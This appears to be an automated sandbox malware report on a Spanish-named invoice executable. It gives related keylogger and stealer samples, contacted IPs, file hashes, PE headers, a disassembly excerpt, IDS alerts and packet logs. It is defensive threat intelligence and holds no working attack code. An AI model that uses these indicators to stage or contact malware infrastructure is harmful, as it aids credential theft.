                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-18024 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            GD7656780000.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Aral#U0131k PO# IRON-TE-160924 _323282-_563028621286 pdf .exeGet hashmaliciousVIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            CLOUDFLARENETUSickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            https://lnk.ie/7469O/e=Get hashmaliciousUnknownBrowse
                                                                                                            • 172.66.0.227
                                                                                                            Ref#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.96.3
                                                                                                            NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.123.96
                                                                                                            63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 104.16.124.96
                                                                                                            ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 172.67.69.226
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 188.114.96.3
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            54328bd36c14bd82ddaa0c04b25ed9adRef#150062.vbeGet hashmaliciousMassLogger RATBrowse
                                                                                                            • 188.114.97.3
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Pedido_335_20241112_614171.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            PO-000041522.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            RE Invoice Request (Nov 2024).exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            Solicitud de cotizacion Stro1268975.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            QUOTATION_NOVQTRA071244#U00faPDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                            • 188.114.97.3
                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ickTGSF56D.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            NfFibKKmiz.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            63w24wNW0d.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            ajbKFgQ0Fl.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            KKXT7bY8bG.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 149.154.167.220
                                                                                                            DHL Packing list.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            #U00c1tutal#U00e1s-meger#U0151s#U00edt#U00e9se_469253-jpg.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            Enclosed Offer.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                                            • 149.154.167.220
                                                                                                            37f463bf4616ecd445d4a1937da06e19JOSHHHHHH.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            Richiesta Proposta (MACHINES ITALIA) 18-11-2024#U00b7pdf.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            Unlock_Tool_v2.6.5.exeGet hashmaliciousStealc, VidarBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            DHL_Shipping_Invoices_Awb_BL_000000000111820242247820020031808174Global180030011182024.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            rBankRemittance_pdf.scr.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            rCEMG242598.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            F8TXbAdG3G.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                            VqCbf9fhnQ.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 142.250.185.174
                                                                                                            • 172.217.16.193
                                                                                                                                 Match: C:\Users\user\AppData\Local\Temp\nsg8E1D.tmp\System.dll
                                                                                                                                 Associated samples:
                                                                                                                                 • Filename: JOSHHHHHH.exe, Detection: malicious, Threat Name: GuLoader, Snake Keylogger
                                                                                                                                 • Filename: rCEMG242598.exe, Detection: malicious, Threat Name: GuLoader, Snake Keylogger
                                                                                                                                 • Filename: SBSLMD5qhm.msi, Detection: malicious, Threat Name: Metasploit
                                                                                                                                 • Filename: mU4lYkmS6K.exe, Detection: malicious, Threat Name: CobaltStrike
                                                                                                                                 • Filename: SBSLMD5qhm.msi, Detection: malicious, Threat Name: Metasploit
                                                                                                                                 • Filename: mU4lYkmS6K.exe, Detection: malicious, Threat Name: CobaltStrike
                                                                                                                                 • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious, Threat Name: Unknown
                                                                                                                                 • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Threat Name: PrivateLoader, PureLog Stealer
                                                                                                                                 • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious, Threat Name: PrivateLoader, PureLog Stealer
                                                                                                                                 • Filename: Batseba.exe, Detection: malicious, Threat Name: GuLoader
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):11776
                                                                                                                                Entropy (8bit):5.890541747176257
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:X24sihno0bW+l97H4GB7QDs91kMtwtobTr4u+QHbazMNHT7dmNIEr:m8vJl97JeoxtN/r3z7YV
                                                                                                                                MD5:75ED96254FBF894E42058062B4B4F0D1
                                                                                                                                SHA1:996503F1383B49021EB3427BC28D13B5BBD11977
                                                                                                                                SHA-256:A632D74332B3F08F834C732A103DAFEB09A540823A2217CA7F49159755E8F1D7
                                                                                                                                SHA-512:58174896DB81D481947B8745DAFE3A02C150F3938BB4543256E8CCE1145154E016D481DF9FE68DAC6D48407C62CBE20753320EBD5FE5E84806D07CE78E0EB0C4
                                                                                                                                Malicious:false
                                                                                                                                Antivirus:
                                                                                                                                • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                Joe Sandbox View:
                                                                                                                                 • Filename: JOSHHHHHH.exe, Detection: malicious
                                                                                                                                 • Filename: rCEMG242598.exe, Detection: malicious
                                                                                                                                 • Filename: SBSLMD5qhm.msi, Detection: malicious
                                                                                                                                 • Filename: mU4lYkmS6K.exe, Detection: malicious
                                                                                                                                 • Filename: SBSLMD5qhm.msi, Detection: malicious
                                                                                                                                 • Filename: mU4lYkmS6K.exe, Detection: malicious
                                                                                                                                 • Filename: TouchEn_nxKey_32bit.exe, Detection: malicious
                                                                                                                                 • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious
                                                                                                                                 • Filename: SecuriteInfo.com.Riskware.OfferCore.11979.8662.exe, Detection: malicious
                                                                                                                                 • Filename: Batseba.exe, Detection: malicious
                                                                                                                                Reputation:moderate, very likely benign file
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):280064
                                                                                                                                Entropy (8bit):7.6785955749534125
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:6144:PcMjJbzfp9GKi35S7rVs13ABPi6mKAyLh/zC8+LvUm:ljJbzfsk2ZXJQbErUm
                                                                                                                                MD5:861C5521243EDE7D6A843BED4028EB0A
                                                                                                                                SHA1:F8DF496611CD8E97D67CF12C4D5F0A61B8D4B58E
                                                                                                                                SHA-256:B04DD763C94E3CB7AF32E8ED4F6E2822F51868165B9658632DAF7C3AD5487820
                                                                                                                                SHA-512:350E4A5943907F99AFE3F9876D15B127AFDB214F7EB26765F54940D36D251BD7EED45B6F58B9DF8C42640184E314F90227523923F7750D30B5930E6D16A36EC0
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):260287
                                                                                                                                Entropy (8bit):1.254154410305323
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:768:Q5nWJhkFhi66opmz9ShwPfMJWoQm6ScPZktW4mOyQi0Qj6RbEKq2hmPpR+4ZFetp:t3zfTlGsyyshore
                                                                                                                                MD5:28C5FEB9676D16DFCAC793FCB586D0BF
                                                                                                                                SHA1:7EA42930F4771A57AA51F3A36BD3492A9D423CA2
                                                                                                                                SHA-256:60753AF58DB3E39BEC4353D9FEB84CA3E597B16B077AAB1CB1DB8F9617DA689A
                                                                                                                                SHA-512:C9FFD961CE1B681FAE3502C42C30011DDFE3F07057E4AF9DD475CCE27EA7F757B136612AE9274FFD7846BD160A6FD3F9A051F811CC06B88D5A5A8E6C86E5D417
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:JPEG image data, baseline, precision 8, 300x400, components 3
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):10006
                                                                                                                                Entropy (8bit):7.924618802758961
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:192:lNvMk8Cb5NZDr/GNVAPsIGGKlmY6fJCveK/2dg7cfcyDmIqAtVv13q:l2+/F/GNVxAKv6Uv3/alfcJIq416
                                                                                                                                MD5:6CADFF319A0C0C41B7A4DDB8BF97467B
                                                                                                                                SHA1:BFFCA9F6851994C709B6DEC83333DA7D6033FE54
                                                                                                                                SHA-256:402A8F58CB8AA75CF9D7A15F3D7E328F8703CCD7B5378F704D71660283D585F3
                                                                                                                                SHA-512:40F2A4355A0A23D955FDA347FFF9490F89A36A83D1395DD144C93B75451DB82CCE010B16AE12391B466BAE45C7AE146BB54BD4FB4D44A430899CD5727F2E7C99
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):405939
                                                                                                                                Entropy (8bit):1.2491912183523404
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:eSl70WcO+njwdPBRvYfH7gIxVXMBMAPAtG3nXw0g9:eSGWgni5egGVcu6AwQ0g9
                                                                                                                                MD5:B8F536887229B6B6A9D9F1C6BDBC830A
                                                                                                                                SHA1:7F6AF7E79427319CD428930CD325EBF234140246
                                                                                                                                SHA-256:9F084456A8DB39E0BE8FF458A057CC112F28976F50CCDEB6B9968475211E36B6
                                                                                                                                SHA-512:754F73D030295425F40FDD4D6B6E32F9D48D08976218510670AF508A2E74041ABE6317770ACBDB6278B0FBBB4908D1B9282462D61F526404CFF3C781431716BE
                                                                                                                                Malicious:false
                                                                                                                                Reputation:low
                                                                                                                                Process:C:\Users\user\Desktop\Factura Honorarios 2024-11-17.exe
                                                                                                                                File Type:data
                                                                                                                                Category:dropped
                                                                                                                                Size (bytes):485288
                                                                                                                                Entropy (8bit):1.252508150615448
                                                                                                                                Encrypted:false
                                                                                                                                SSDEEP:1536:nCssk3ToWdMOZQJ6sF7DR6iI3gP1KeCHDkTv:nCssk3UCNMZDRMkeyv
                                                                                                                                MD5:B7786B087E97406D67958314CE8D7DFC
                                                                                                                                SHA1:857FBDE03F498A5CF1B386C74485C24633673AF4
                                                                                                                                SHA-256:7A03749583188B2FBBF13ED0788600C942BBA5FCF4D34BEBBEC2764CB35C2D7B
                                                                                                                                SHA-512:5FA986F3F85D66DCD22643B11F233EBA31E04006D7F2EFCCE22CF6CB29B072E2F86FD3AA5B707D1CEC6ED3522D49EFDD247241AE147C5692AD5D438B31525767
                                                                                                                                Malicious:false
                                                                                                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                Entropy (8bit):7.5106727657586685
                                                                                                                                TrID:
                                                                                                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                File name:Factura Honorarios 2024-11-17.exe
                                                                                                                                File size:701'493 bytes
                                                                                                                                MD5:2494d7b2fd14dc5604fd6aa412f170fc
                                                                                                                                SHA1:dc2b1e324c49c9f0fa446211ed24841c48371ef0
                                                                                                                                SHA256:0cf14ff76c5d927ad6de94e8d632592a776adb36c733680fcf6385a5d1fed069
                                                                                                                                SHA512:93543406973f6243703fa508a16c37166fc25227755eb97b62556a2d5370cd9b22bf21f0cb7c825b3d2fc4c727f623fa0fe586c0e653c3f9a48ef9a83dea6d90
                                                                                                                                SSDEEP:12288:fTkuHDdugNuvuAE69ciyBfwKvpsQKnsk2axTsy:fTRogNATSNJvqxTsy
                                                                                                                                TLSH:04E40183EC44D690E9644F30643F1D7E83AB3E7A5944091E3F98B6742CF3592E617A2B
                                                                                                                                Icon Hash:1716c64c5e5ab51d
                                                                                                                                Entrypoint:0x403359
                                                                                                                                Entrypoint Section:.text
                                                                                                                                Digitally signed:false
                                                                                                                                Imagebase:0x400000
                                                                                                                                Subsystem:windows gui
                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                Time Stamp:0x5A6FED2E [Tue Jan 30 03:57:34 2018 UTC]
                                                                                                                                TLS Callbacks:
                                                                                                                                CLR (.Net) Version:
                                                                                                                                OS Version Major:4
                                                                                                                                OS Version Minor:0
                                                                                                                                File Version Major:4
                                                                                                                                File Version Minor:0
                                                                                                                                Subsystem Version Major:4
                                                                                                                                Subsystem Version Minor:0
                                                                                                                                Import Hash:b34f154ec913d2d2c435cbd644e91687
                                                                                                                                Instruction
                                                                                                                                sub esp, 000002D4h
                                                                                                                                push ebx
                                                                                                                                push esi
                                                                                                                                push edi
                                                                                                                                push 00000020h
                                                                                                                                pop edi
                                                                                                                                xor ebx, ebx
                                                                                                                                push 00008001h
                                                                                                                                mov dword ptr [esp+14h], ebx
                                                                                                                                mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                mov dword ptr [esp+1Ch], ebx
                                                                                                                                call dword ptr [004080A8h]
                                                                                                                                call dword ptr [004080A4h]
                                                                                                                                and eax, BFFFFFFFh
                                                                                                                                cmp ax, 00000006h
                                                                                                                                mov dword ptr [0042A20Ch], eax
                                                                                                                                je 00007F682CF010F3h
                                                                                                                                push ebx
                                                                                                                                call 00007F682CF043A5h
                                                                                                                                cmp eax, ebx
                                                                                                                                je 00007F682CF010E9h
                                                                                                                                push 00000C00h
                                                                                                                                call eax
                                                                                                                                mov esi, 004082B0h
                                                                                                                                push esi
                                                                                                                                call 00007F682CF0431Fh
                                                                                                                                push esi
                                                                                                                                call dword ptr [00408150h]
                                                                                                                                lea esi, dword ptr [esi+eax+01h]
                                                                                                                                cmp byte ptr [esi], 00000000h
                                                                                                                                jne 00007F682CF010CCh
                                                                                                                                push 0000000Ah
                                                                                                                                call 00007F682CF04378h
                                                                                                                                push 00000008h
                                                                                                                                call 00007F682CF04371h
                                                                                                                                push 00000006h
                                                                                                                                mov dword ptr [0042A204h], eax
                                                                                                                                call 00007F682CF04365h
                                                                                                                                cmp eax, ebx
                                                                                                                                je 00007F682CF010F1h
                                                                                                                                push 0000001Eh
                                                                                                                                call eax
                                                                                                                                test eax, eax
                                                                                                                                je 00007F682CF010E9h
                                                                                                                                or byte ptr [0042A20Fh], 00000040h
                                                                                                                                push ebp
                                                                                                                                call dword ptr [00408044h]
                                                                                                                                push ebx
                                                                                                                                call dword ptr [004082A0h]
                                                                                                                                mov dword ptr [0042A2D8h], eax
                                                                                                                                push ebx
                                                                                                                                lea eax, dword ptr [esp+34h]
                                                                                                                                push 000002B4h
                                                                                                                                push eax
                                                                                                                                push ebx
                                                                                                                                push 004216A8h
                                                                                                                                call dword ptr [00408188h]
                                                                                                                                push 0040A2C8h
                                                                                                                                Programming Language:
                                                                                                                                • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x4d000 | 0x31a60 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x62a5 | 0x6400 | f4cff166abb4376522cf86cbd302f644 | False | 0.658984375 | data | 6.431390019180314 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 2914bac53cd4485c9822093463e4eea6 | False | 0.4509765625 | data | 5.146454805063938 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20318 | 0x600 | 7d0d44c89e64b001096d8f9c60b1ac1b | False | 0.4928385416666667 | data | 3.90464114821524 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x22000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x4d000 | 0x31a60 | 0x31c00 | 237771be3091971063543e3d2d100b74 | False | 0.4750166849874372 | data | 5.510842081259168 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x4d448 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | United States | 0.2920412871169999
RT_ICON | 0x5dc70 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | United States | 0.422640319529115
RT_ICON | 0x67118 | 0x71dc | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9881295457664334
RT_ICON | 0x6e2f8 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | United States | 0.4291589648798521
RT_ICON | 0x73780 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | United States | 0.4052905054322154
RT_ICON | 0x779a8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | United States | 0.5110995850622406
RT_ICON | 0x79f50 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | United States | 0.5211069418386491
RT_ICON | 0x7aff8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | United States | 0.5119936034115139
RT_ICON | 0x7bea0 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2400 | English | United States | 0.6262295081967213
RT_ICON | 0x7c828 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | United States | 0.677797833935018
RT_ICON | 0x7d0d0 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | United States | 0.6785714285714286
RT_ICON | 0x7d798 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | United States | 0.49710982658959535
RT_ICON | 0x7dd00 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | United States | 0.674645390070922
RT_DIALOG | 0x7e168 | 0x100 | data | English | United States | 0.5234375
RT_DIALOG | 0x7e268 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x7e388 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x7e450 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x7e4b0 | 0xbc | data | English | United States | 0.6595744680851063
RT_VERSION | 0x7e570 | 0x1ac | data | English | United States | 0.5747663551401869
RT_MANIFEST | 0x7e720 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795

DLL | Import
KERNEL32.dll | SetEnvironmentVariableW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, SetCurrentDirectoryW, GetFileAttributesW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, ExitProcess, GetShortPathNameW, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalLock, GlobalUnlock, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance

Language of compilation system | Country where language is spoken | Map
English | United States

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-18T13:50:47.489752+0100 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 49709 | 142.250.185.174 | 443 | TCP
2024-11-18T13:50:55.714204+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 193.122.6.168 | 80 | TCP
2024-11-18T13:50:59.229900+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49711 | 193.122.6.168 | 80 | TCP
2024-11-18T13:50:59.975414+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49715 | 188.114.97.3 | 443 | TCP
2024-11-18T13:51:00.870450+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.8 | 49716 | 193.122.6.168 | 80 | TCP
2024-11-18T13:51:13.473984+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.8 | 49729 | 188.114.97.3 | 443 | TCP

Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                Nov 18, 2024 13:50:51.246599913 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.246742010 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.251759052 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.252171040 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.252192974 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.252398968 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.255943060 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.256091118 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.258758068 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.258893967 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.258990049 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.259176016 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.261025906 CET44349710172.217.16.193192.168.2.8
                                                                                                                                Nov 18, 2024 13:50:51.261092901 CET49710443192.168.2.8172.217.16.193
                                                                                                                                Nov 18, 2024 13:50:51.302272081 CET44349710172.217.16.193192.168.2.8
